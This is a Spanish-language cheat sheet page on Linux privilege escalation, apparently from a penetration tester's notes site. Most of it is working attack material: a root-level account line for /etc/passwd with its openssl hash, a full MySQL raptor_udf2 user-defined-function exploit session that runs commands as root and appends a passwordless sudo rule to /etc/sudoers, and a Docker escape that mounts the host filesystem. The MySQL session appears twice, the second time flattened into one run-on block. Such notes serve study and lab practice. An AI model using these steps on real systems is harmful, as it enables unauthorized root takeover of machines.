Linux Privilege Escalation

Agregar usuario con privilegios de root al passwd

openssl passwd -1 -salt gerh pass123
// El resultado del comando previo es un hash: $1$gerh$.X4NnMSmCMib61zDEDWTn0

Luego se concatena el nombre del usuario antes del hash spartan: y se finaliza con :0:0:root:/root:/bin/bash
spartan:$1$gerh$.X4NnMSmCMib61zDEDWTn0:0:0:root:/root:/bin/bash

su spartan
pass123

Pagina referente al tema de SUID

Se recomienda buscar writeups sobre el binario en cuestión:

GTFOBinsgtfobins.github.io

Detectar el OS de linux

cat /etc/*-release
cat /etc/issue

Encontrar directorios en donde puedes alojar informacion

find . -writable

Tecnica utilizando mysql que corre como root

lordoftherootejtaal.net

[j0hn@timeclock ~]$ gcc -g -c raptor_udf2.c 
[j0hn@timeclock ~]$ gcc -g -shared -o raptor_udf2.so raptor_udf2.o -lc
[j0hn@timeclock ~]$ ls -la /home/j0hn/raptor_udf2.*
-rw-rw-r-- 1 j0hn j0hn 3314 Feb  7 22:08 /home/j0hn/raptor_udf2.c
-rw-rw-r-- 1 j0hn j0hn 3144 Feb  7 22:08 /home/j0hn/raptor_udf2.o
-rwxrwxr-x 1 j0hn j0hn 6029 Feb  7 22:08 /home/j0hn/raptor_udf2.so


mysql> use mysql;
mysql> create table foo(line blob);
Query OK, 0 rows affected (0.03 sec)

mysql> insert into foo values(load_file('/home/j0hn/raptor_udf2.so'));
Query OK, 1 row affected (0.00 sec)

mysql> select * from foo into dumpfile '/usr/lib/raptor_udf2.so';
Query OK, 1 row affected (0.00 sec)

mysql> create function do_system returns integer soname 'raptor_udf2.so';
Query OK, 0 rows affected, 1 warning (0.00 sec)
mysql> select * from mysql.func;
+-----------+-----+----------------+----------+
| name      | ret | dl             | type     |
+-----------+-----+----------------+----------+
| do_system |   2 | raptor_udf2.so | function | 
+-----------+-----+----------------+----------+
1 row in set (0.00 sec)

mysql> select do_system('id > /tmp/out;');
+-----------------------------+
| do_system('id > /tmp/out;') |
+-----------------------------+
|                  4294967296 | 
+-----------------------------+
1 row in set (0.00 sec)

mysql> select do_system('id > /tmp/out; chmod 777 /tmp/out');
+------------------------------------------------+
| do_system('id > /tmp/out; chmod 777 /tmp/out') |
+------------------------------------------------+
|                                     4294967296 | 
+------------------------------------------------+
1 row in set (0.00 sec)

mysql> exit

### Escalacion final por medio de /etc/sudoers

[j0hn@timeclock ~]$ mysql -u root 
mysql> select do_system('echo "j0hn ALL =(ALL) NOPASSWD: ALL">> /etc/sudoers');
+------------------------------------------------------------------+
| do_system('echo "j0hn ALL =(ALL) NOPASSWD: ALL">> /etc/sudoers') |
+------------------------------------------------------------------+
|                                                       4294967296 | 
+------------------------------------------------------------------+
1 row in set (0.00 sec)

mysql> exit
Bye
[j0hn@timeclock ~]$ sudo bash
[root@timeclock ~]# cd /root
[root@timeclock root]# ls -la

Escalacion VIA DOCKER

docker images ## Obtener el valor de alpine
docker run -it -v /:/mnt alpine chroot /mnt bash

Validacion de tareas CRON

Crontab.guru - The cron schedule expression generatorcrontab.guru

CAP

getcap -r / 2>/dev/null

AnteriorBypass UAC SiguienteHash Identification

Última actualización hace 3 años

[j0hn@timeclock ~]$ gcc -g -c raptor_udf2.c [j0hn@timeclock ~]$ gcc -g -shared -o raptor_udf2.so raptor_udf2.o -lc [j0hn@timeclock ~]$ ls -la /home/j0hn/raptor_udf2.* -rw-rw-r-- 1 j0hn j0hn 3314 Feb 7 22:08 /home/j0hn/raptor_udf2.c -rw-rw-r-- 1 j0hn j0hn 3144 Feb 7 22:08 /home/j0hn/raptor_udf2.o -rwxrwxr-x 1 j0hn j0hn 6029 Feb 7 22:08 /home/j0hn/raptor_udf2.so mysql> use mysql; mysql> create table foo(line blob); Query OK, 0 rows affected (0.03 sec) mysql> insert into foo values(load_file('/home/j0hn/raptor_udf2.so')); Query OK, 1 row affected (0.00 sec) mysql> select * from foo into dumpfile '/usr/lib/raptor_udf2.so'; Query OK, 1 row affected (0.00 sec) mysql> create function do_system returns integer soname 'raptor_udf2.so'; Query OK, 0 rows affected, 1 warning (0.00 sec) mysql> select * from mysql.func; +-----------+-----+----------------+----------+ | name | ret | dl | type | +-----------+-----+----------------+----------+ | do_system | 2 | raptor_udf2.so | function | +-----------+-----+----------------+----------+ 1 row in set (0.00 sec) mysql> select do_system('id > /tmp/out;'); +-----------------------------+ | do_system('id > /tmp/out;') | +-----------------------------+ | 4294967296 | +-----------------------------+ 1 row in set (0.00 sec) mysql> select do_system('id > /tmp/out; chmod 777 /tmp/out'); +------------------------------------------------+ | do_system('id > /tmp/out; chmod 777 /tmp/out') | +------------------------------------------------+ | 4294967296 | +------------------------------------------------+ 1 row in set (0.00 sec) mysql> exit ### Escalacion final por medio de /etc/sudoers [j0hn@timeclock ~]$ mysql -u root mysql> select do_system('echo "j0hn ALL =(ALL) NOPASSWD: ALL">> /etc/sudoers'); +------------------------------------------------------------------+ | do_system('echo "j0hn ALL =(ALL) NOPASSWD: ALL">> /etc/sudoers') | +------------------------------------------------------------------+ | 4294967296 | +------------------------------------------------------------------+ 1 row in set (0.00 sec) mysql> exit Bye [j0hn@timeclock ~]$ sudo bash [root@timeclock ~]# cd /root [root@timeclock root]# ls -la

hashtagAgregar usuario con privilegios de root al passwd

hashtagPagina referente al tema de SUID

hashtagDetectar el OS de linux

hashtagEncontrar directorios en donde puedes alojar informacion

hashtagTecnica utilizando mysql que corre como root

hashtagEscalacion VIA DOCKER

hashtagValidacion de tareas CRON

hashtagCAP